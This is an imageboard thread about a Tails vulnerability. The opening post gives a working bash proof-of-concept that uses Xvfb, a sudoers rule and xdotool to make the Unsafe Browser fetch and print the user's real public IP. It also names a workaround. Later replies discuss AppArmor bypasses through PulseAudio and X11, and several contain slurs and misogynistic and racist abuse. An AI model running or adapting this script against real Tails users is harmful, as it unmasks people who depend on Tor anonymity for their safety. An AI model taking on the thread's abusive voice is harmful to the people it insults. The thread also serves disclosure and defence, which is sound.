Tails IP leak

A compromised local user on Tails can get your pubic IP, no privilege escalation required: labs.riseup.net/code/issues/15635

#!/bin/bashexport DISPLAY=:69mv /run/user/1000/bus{,.bak}Xvfb $DISPLAY -r -nocursor & xpid=$!sleep 1sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &xdotool search --sync --name zenity 1>/dev/nullxdotool key --delay 200 Tab Returnxdotool search --sync --name Unsafe 1>/dev/nullxdotool key --delay 200 ctrl+lxdotool type --delay 200 www.yourip.usxdotool key --delay 200 Returnxdotool search --sync --name Your getwindowname | awk '{print $5}'mv /run/user/1000/bus{.bak,}kill "$xpid" exit 0

Workaround: delete /etc/sudoers.d/zzz_unsafe-browser after start up

Attached: tails.png (1024x408, 49.9K)

Other urls found in this thread:


What's the unsafe browser even for? Capture portals?

Did you know that Tails updates very fast for obvious security reasons?

I think that leak will be fixed in 3.8.

If someone compromises Tor Browser, they would still need to get around apparmor to execute something like this.

You can bypass Tor Browser's apparmor policy through pulseaudio or x11, there are PoCs out. Pulseaudio has an API that allows connected programs to execute commands, and pulseaudio doesn't have an apparmor profile on Tails yet. X11 is a nightmare and won't be fixed until Wayland.


He obviously means public facing. Don't try to feign intelligence through sophistry.

How's Sway WM?

stop using condescending language to me, shitlord

Attached: condescending.png (1154x1608, 446.42K)

what do you expect when every Linux skiddie in the world unironically plays around with things like sudo and X's retarded undocumented security architecture. sandboxing in linux is a joke. 99% of linux skiddies will just run X with default settings which allows the server (i.e, your entire desktop and everything you do) to be controlled over TCP. how is this relevant to the tails IP leaking exploit? because privilege separation is a much easier problem to solve than avoiding leaking the IP address yet they can't even get _that_ right

What's a 'skiddie'?

Oh dear, my pubic IP

Attached: 1a4cf7e16ddfb011b4ff8797baea4088c2deefcde4c10851fb4f995f36469f8b.jpg (700x1000, 240.73K)

I wouldn't bother trying to secure X, it's pointless.



So, someone would have to physically be next to me or use JavaScript (which is by default blocked) to do this? It doesn't seem like a big deal. Is it getting worked on?

I guess a post-boot script could be made to delete this, as a temporary solution.

If any application is exploited (browser, totem, libreoffice, archiver, pidgin, etc) they could get your IP. Normally, they would need to chain a privilege escalation exploit afterwards to leak your IP.

What in the name of Christ is xdotool?

It let's you script stuff like pressing keys or moving the mouse.

Really, fuck off, self-important roastie bitch. Everyone should be as offensive as possible to these cunts and hopefully they all have a stroke or at the very least fuck off into unicorn land where they belong.

She's right. If you aren't willing to stop being a huge faggot all the time people will not respond, further prolonging anything from being fixed.

Who cares if some retard's question doesn't get answered or if some pajeet's problem doesn't get fixed? People asking questions have literally no leverage over anybody.

A local users could log your keys, gather information about your MAC address/router address MAC, and hardware serial numbers. It's best to use something like Qubes-Whonix if you want to prevent leaks. It would have no internet access except through a Tor gateway running in another VM.

A VM escape or Tor exploits would be needed to leak your IP. Tails is only good because of it's amnesic feature.

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Attached: tails.jpeg (221x228 5.28 KB, 8.86K)

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